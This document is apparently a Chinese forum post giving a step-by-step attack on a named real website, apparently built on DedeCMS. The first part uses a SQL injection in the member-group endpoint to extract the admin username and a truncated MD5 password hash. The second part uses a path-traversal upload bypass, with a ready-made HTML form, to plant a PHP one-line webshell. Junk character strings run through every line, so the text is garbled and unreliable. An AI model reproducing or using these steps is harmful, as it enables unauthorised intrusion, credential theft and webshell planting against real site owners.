①注入漏洞。6 J! o* s5 o8 \4 s1 b& P+ Y2 U! b" \
这站 http://www.political-security.com/3 I" ~$ k" [: p$ ?% z5 H
首先访问“/data/admin/ver.txt”页面获取系统最后升级时间,
- n! g: G) x1 n8 ?www.political-security.com/data/mysql_error_trace.inc 爆后台3 b' k, A* ~5 R' u* C
然后访问“/member/ajax_membergroup.php?action=post&membergroup=1”页面,如图说明存在该漏洞。
2 \: ]. U5 U* C8 i8 _% ~) P然后写上语句
% ?0 J @) o3 {查看管理员帐号
5 ]! K2 P& H4 h7 q) W* Nhttp://www.political-security.co ... &membergroup=@`
8 F! D" @5 x3 D; @& O3 B- F$ c; v) r+ M
admin
/ C6 Q7 u0 g# Q3 y" \$ X+ [9 H3 {2 m2 |# t; C7 P% e; c
查看管理员密码3 D4 }* U4 F+ g, k" \! |; y- c
http://www.political-security.co ... &membergroup=@`$ q; ` v: @$ i
, R% ~# f+ Z/ g0 V G8d29b1ef9f8c5a5af429) G2 W+ P# X! F8 w. D' ~) B4 w) |" b
7 L& y8 c# |3 U. `$ e查看管理员密码' F: l$ ?4 W$ Q* r$ B& R& |% Y6 M" V
# o0 V. g, ?* [: r得到的是19位的,去掉前三位和最后一位,得到管理员的16位MD5( N* A" V2 M9 b1 b8 [9 p6 v
# P& O$ Z0 W2 a) Z1 J( E8d2
1 ], c/ W0 ^. w* V7 s6 Y" j9b1ef9f8c5a5af42
2 x" P9 W1 x$ [/ v91 j8 [ @6 b2 h2 G& D4 ]
5 F# v7 R z# I; Wcmd5没解出来 只好测试第二个方法/ T4 m+ _3 e a' J- S
2 V) y3 N# }! o0 ?9 L$ c
v# A, `3 F& n, C$ t% G8 ~, P. D②上传漏洞:& F* w, X* W' X/ }' n- \( [
( ~+ C! j C0 N, Z
只要登陆会员中心,然后访问页面链接8 [7 l$ z* W$ F2 G. I6 H
“/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post”9 ~! }# i, A: a% g. I& g
' Q& |0 N/ S& {' F, Q如图,说明通过“/plus/carbuyaction.php”已经成功调用了上传页面“/dialog/select_soft_post”/ a) j+ Y+ T! r* x! z$ Z
7 t; C# o% f( ?+ O/ {于是将Php一句话木马扩展名改为“rar”等,利用提交页面upload1.htm
4 L- w, |) v! Z0 z; H$ z
p( @9 I6 I0 W; |( a7 f( ?/ L# q% c; r# u<form action="http://www.political-security.com/plus/carbuyaction.php?dopost=memclickout&oid=S-P0RN8888&rs[code]=../dialog/select_soft_post" method="post" enctype="multipart/form-data" name="form1"> file:<input name="uploadfile" type="file" /><br> newname:<input name="newname" type="text" value="myfile.Php"/> <button class="button2" type="submit">提交</button><br><br>$ w) W, H% T/ S* b/ Z0 S0 m
或者* y7 L: \% U4 J S* z% ^6 I
即可上传成功 |